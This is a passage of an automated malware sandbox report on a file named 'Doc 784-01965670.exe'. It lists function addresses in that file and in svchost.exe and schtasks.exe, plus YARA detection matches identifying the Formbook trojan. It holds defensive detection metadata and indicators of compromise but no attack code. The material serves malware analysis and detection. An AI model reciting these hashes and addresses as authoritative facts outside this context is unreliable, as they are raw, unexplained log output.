            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004465660_2_00446566
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00490D700_2_00490D70
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F956400_2_03F95640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180132_2_00418013
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8C32_2_0040F8C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8C72_2_0040F8C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8BA2_2_0040F8BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161FE2_2_004161FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162032_2_00416203
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FAE32_2_0040FAE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB632_2_0040DB63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E02_2_004013E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023B02_2_004023B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C202_2_00402C20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E4E32_2_0042E4E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DCA72_2_0040DCA7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F302_2_00401F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027B02_2_004027B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C003E62_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F02_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA3522_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC02C02_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF41A22_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC81582_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD20002_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE44202_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBEFA02_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE2F302_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDCD1F2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B8739A2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF132D2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D34C2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B452A02_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C095C32_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD22_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD52_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F702C04_2_02F702C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F902744_2_02F90274
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FB03E64_2_02FB03E6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EFE3F04_2_02EFE3F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAA3524_2_02FAA352
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F820004_2_02F82000
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA81CC4_2_02FA81CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FB01AA4_2_02FB01AA
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA41A24_2_02FA41A2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F781584_2_02F78158
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F8A1184_2_02F8A118
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EE01004_2_02EE0100
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F0C6E04_2_02F0C6E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EEC7C04_2_02EEC7C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF07704_2_02EF0770
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F147504_2_02F14750
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F9E4F64_2_02F9E4F6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA24464_2_02FA2446
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F944204_2_02F94420
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FB05914_2_02FB0591
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF05354_2_02EF0535
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EEEA804_2_02EEEA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA6BD74_2_02FA6BD7
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAAB404_2_02FAAB40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F1E8F04_2_02F1E8F0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02ED68B84_2_02ED68B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF28404_2_02EF2840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EFA8404_2_02EFA840
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF29A04_2_02EF29A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FBA9A64_2_02FBA9A6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F069624_2_02F06962
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAEEDB4_2_02FAEEDB
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F02E904_2_02F02E90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FACE934_2_02FACE93
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF0E594_2_02EF0E59
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAEE264_2_02FAEE26
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EFCFE04_2_02EFCFE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EE2FC84_2_02EE2FC8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F6EFA04_2_02F6EFA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F64F404_2_02F64F40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F10F304_2_02F10F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F92F304_2_02F92F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F32F284_2_02F32F28
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EE0CF24_2_02EE0CF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F90CB54_2_02F90CB5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF0C004_2_02EF0C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EEADE04_2_02EEADE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F08DBF4_2_02F08DBF
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F8CD1F4_2_02F8CD1F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EFAD004_2_02EFAD00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F912ED4_2_02F912ED
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F0B2C04_2_02F0B2C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF52A04_2_02EF52A0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F3739A4_2_02F3739A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EDD34C4_2_02EDD34C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA132D4_2_02FA132D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA70E94_2_02FA70E9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAF0E04_2_02FAF0E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF70C04_2_02EF70C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F9F0CC4_2_02F9F0CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EFB1B04_2_02EFB1B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FBB16B4_2_02FBB16B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F2516C4_2_02F2516C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EDF1724_2_02EDF172
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA16CC4_2_02FA16CC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F356304_2_02F35630
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAF7B04_2_02FAF7B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EE14604_2_02EE1460
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAF43F4_2_02FAF43F
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FB95C34_2_02FB95C3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F8D5B04_2_02F8D5B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA75714_2_02FA7571
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F9DAC64_2_02F9DAC6
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F35AA04_2_02F35AA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F8DAAC4_2_02F8DAAC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F91AA34_2_02F91AA3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F63A6C4_2_02F63A6C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAFA494_2_02FAFA49
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA7A464_2_02FA7A46
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F65BF04_2_02F65BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F2DBF94_2_02F2DBF9
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F0FB804_2_02F0FB80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAFB764_2_02FAFB76
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF38E04_2_02EF38E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F5D8004_2_02F5D800
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F0B9504_2_02F0B950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF99504_2_02EF9950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F859104_2_02F85910
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF9EB04_2_02EF9EB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EB3FD24_2_02EB3FD2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EB3FD54_2_02EB3FD5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAFFB14_2_02FAFFB1
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF1F924_2_02EF1F92
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAFF094_2_02FAFF09
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FAFCF24_2_02FAFCF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F69C324_2_02F69C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02F0FDC04_2_02F0FDC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA7D734_2_02FA7D73
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02FA1D5A4_2_02FA1D5A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02EF3D404_2_02EF3D40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_00451AD04_2_00451AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044CA174_2_0044CA17
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044CA244_2_0044CA24
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044CA204_2_0044CA20
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044CC404_2_0044CC40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044ACC04_2_0044ACC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044AE044_2_0044AE04
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_004551704_2_00455170
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0045335B4_2_0045335B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_004533604_2_00453360
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0046B6404_2_0046B640
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B5E2954_2_02B5E295
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B5E3B34_2_02B5E3B3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B5D7B84_2_02B5D7B8
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B5E74C4_2_02B5E74C
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B5CA634_2_02B5CA63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F37E54 appears 111 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02EDB970 appears 280 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F6F290 appears 105 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F25130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F5EA12 appears 86 times
            Source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000048ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Doc 784-01965670.exe
            Source: Doc 784-01965670.exe, 00000000.00000003.2052600590.0000000004743000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Doc 784-01965670.exe
            Source: Doc 784-01965670.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
